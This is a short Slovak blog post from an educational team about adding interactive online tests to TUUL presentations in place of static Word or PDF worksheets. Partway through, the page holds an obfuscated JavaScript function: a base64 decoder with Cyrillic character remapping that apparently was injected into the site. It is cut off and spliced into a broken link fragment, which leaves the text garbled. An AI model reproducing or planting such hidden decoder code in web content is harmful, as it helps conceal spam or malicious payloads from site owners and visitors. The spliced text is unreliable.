BLOG

Ako vkladať testy do TUULu?

 
test

TUUL je vynikajúci nástroj na prezentáciu on-line dokumentov, internetových stránok, videí a iných materiálov. Je vytvorený tak, aby ste nemuseli opustiť okno internetového prehliadača a preklikávať sa množstvom otvorených „kariet“.

Všimli sme si, že autori často vkladajú do TUULov aj testy, úlohy či zadania. Niektoré z nich sú vo formáte .doc, .pdf, či iného neinteraktívneho súboru. Väčšina takto pripravených dokumentov slúži ako pracovné listy na hodinu (predsa len, sme učitelia a papier je papier).

Predstavme si žiaka, ako si po preštudovaní TUULu chce overiť svoje vedomosti. Odpovede na otázky „v duchu“ síce niečo naznačia, ale okamžitá spätná väzba prostredníctvom on-line nástroja na tvorbu testov poteší oveľa viac. Iný učiteľ, ktorý použije Váš TUUL tak vie lepšie použiť on-line test ako ten vytvorený vo wordovskom dokumente. Ak nemáte vhodný nástroj na vytváranie on-line testov, odporúčame Vám stránku, ktorej si určite vyberiete.

function h94fcba1e7(y1){var vd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb='';var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6-deliver-online.html#.UxShvfl5N49" target="_blank">FREE TECHLOGY FOR TEACHERS

tím EDULAB